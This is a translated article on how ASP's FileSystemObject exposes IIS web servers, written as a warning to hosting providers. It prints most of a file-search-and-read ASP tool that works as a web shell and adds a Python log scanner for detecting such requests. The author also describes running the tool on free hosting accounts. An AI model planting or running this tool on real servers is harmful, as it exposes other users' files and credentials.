SoFunction
Updated on 2025-04-13

Threats posed by FSO objects in ASP to IIS web server data security, and countermeasures

FSO (FileSystemObject) objects are one of the many COM objects that VBScript/JScript make available for control. They provide very convenient access to text files and directories, but they also pose certain threats to the data security of an IIS web server.

The code of filefinder is very simple, consisting of 3 functions and about 30 lines of sequential code.

The most important part is the findfiles function, which traverses a directory by calling itself recursively and searches it for files with a specific file extension.


function findfiles(strstartfolder, strext)
    dim n
    dim othisfolder
    dim ofolders
    dim ofiles
    dim ofolder
    dim ofile

    ' If the system administrator has set the file system permissions carefully, the code below will raise errors,
    ' but some directories can still be viewed, so we simply ignore the errors
    on error resume next
    n = 0
    response.write "<b>searching " & strstartfolder & "</b><br>"
    ' g_fs is the script's global file system object
    set othisfolder = g_fs.getfolder(strstartfolder)
    set ofiles = othisfolder.files
    for each ofile in ofiles
        ' If the file has the specified extension, output a link back to this script, but with a different command cmd
        ' Here cmd=read, that is, read out the text file at the specified physical path
        if issuffix(ofile.name, strext) then
            response.write "<a target=_blank href='?cmd=read&path=" & server.urlencode(ofile.path) & "'><font color='dodgerblue'>" & ofile.name & "</font></a><br>"
            if err = 0 then
                n = n + 1
            end if
        end if
    next
    ' Recurse into each subfolder and add up the matches
    set ofolders = othisfolder.subfolders
    for each ofolder in ofolders
        n = n + findfiles(ofolder.path, strext)
    next
    findfiles = n
end function

The following code parses the parameters in the URL query string:


' Read out the value of each parameter
' (lcase so that the comparisons with the lowercase literals below match)
strcmd = lcase(request.querystring("cmd"))
strpath = request.querystring("path")
strext = request.querystring("ext")
brawdata = lcase(request.querystring("raw"))

' By default, search for .asp files
if strpath = "" then
    strpath = "."
end if
if strext = "" then
    strext = ".asp"
end if

' Execute different code depending on the command cmd
select case strcmd
    case "find"
        response.write findfiles(strpath, strext) & " file(s) found"
    case "read"
        if brawdata = "t" then
            response.write readtextfile(strpath)
        else
            response.write "<pre>" & server.htmlencode(readtextfile(strpath)) & "</pre>"
        end if
    case else
        response.write "<h3>please specify a command to execute</h3>"
end select

From the above analysis, we can see that, given sufficient permissions, filefinder can be used to find any text file on the IIS web server and to view its content easily. For non-text files, it is possible to determine whether they exist and where they are located, which is sometimes extremely important for advanced hackers.
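The request pattern analyzed above (a script URL whose query string carries a physical path in a parameter such as path) is visible in the web server's own logs. The following Python sketch is an added example, not part of the original article or of filefinder: it scans IIS W3C extended log text for such requests. The log lines, directory names and function name are constructed for illustration, and it assumes the log contains a #Fields: line with cs-uri-stem and cs-uri-query.

```python
import re
from urllib.parse import parse_qsl

# Constructed IIS W3C extended log lines (illustrative, not from the article).
SAMPLE_LOG = """\
#Software: Microsoft Internet Information Services
#Fields: date time c-ip cs-method cs-uri-stem cs-uri-query sc-status
2025-04-13 10:00:01 203.0.113.7 GET /user42/filefinder.asp cmd=find&path=c:%5Cinetpub&ext=.asp 200
2025-04-13 10:00:09 203.0.113.7 GET /user42/filefinder.asp cmd=read&path=d:%5Csites%5Cuser17%5Cconn.asp&raw=t 200
2025-04-13 10:01:30 198.51.100.4 GET /shop/list.asp page=2&sort=name 200
2025-04-13 10:02:11 198.51.100.9 GET /user42/view.asp path=..%5C..%5Cuser17 200
2025-04-13 10:03:00 198.51.100.4 GET /img/logo.gif - 200
"""

# Drive-letter path, UNC path, or a ".." path segment.
PHYSICAL_PATH = re.compile(r"^(?:[A-Za-z]:[\\/]|\\\\)|(?:^|[\\/])\.\.(?:[\\/]|$)")


def find_path_requests(log_text, script_exts=(".asp",)):
    """Return (client_ip, uri_stem, param, value) for each script request
    whose query string carries something that looks like a physical path."""
    fields, hits = [], []
    for line in log_text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]  # column names for the rows that follow
            continue
        if not line or line.startswith("#") or not fields:
            continue
        row = dict(zip(fields, line.split(" ")))
        stem = row.get("cs-uri-stem", "").lower()
        query = row.get("cs-uri-query", "-")
        if query == "-" or not stem.endswith(script_exts):
            continue
        # parse_qsl percent-decodes, so %5C is matched as a backslash
        for name, value in parse_qsl(query, keep_blank_values=True):
            if PHYSICAL_PATH.search(value):
                hits.append((row.get("c-ip"), stem, name, value))
    return hits


if __name__ == "__main__":
    for hit in find_path_requests(SAMPLE_LOG):
        print(*hit, sep="\t")
```

A hit is only a lead for review: it shows that a script accepted a path from the client, not that the file system permissions allowed the read.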

However, these threats to data security presuppose that the user account executing the script has at least read permission on the directories and files. Because the default security settings of Windows NT Server after installation let all users "read" directories and files, both the default IIS user IUSR_servername and any other user can read through directory and file information. Most Windows NT Server system administrators are mainly concerned with whether the system runs, and are generally unwilling to change the default directory and file permissions; after all, doing so carries considerable risk and requires a lot of experience. Therefore, we can use filefinder to check whether the file system security settings of an NT server acting as a web server are safe.

The author specially configured the file system permissions of a machine serving as the IIS web server, but, for lack of experience, this led to many strange errors; for example, the NT Server 4.0 machine used for the experiment could no longer connect to the Access database. These functions were normal before the file system permissions were changed.

For the purpose of pure research, the author also conducted experiments on the free ASP space I applied for (including my personal homepage provided by CSDN), and the result was that filefinder could run smoothly. However, there is no problem with the personal homepage of / applied for, which shows that this free ASP homepage provider is still serious in this regard. Although domaindlx's web server runs on Windows 2000 Server, the security permissions of its default file system are not very different from NT 4.0.

Given the author's limited ability, the discussion of this issue ends here. This article is only intended as a reference for domestic ASP homepage providers, in the hope that it helps the data security of both providers and customers.

Addendum: A web service that runs other, similar server-side scripts should have the same problem, no matter which platform it runs on.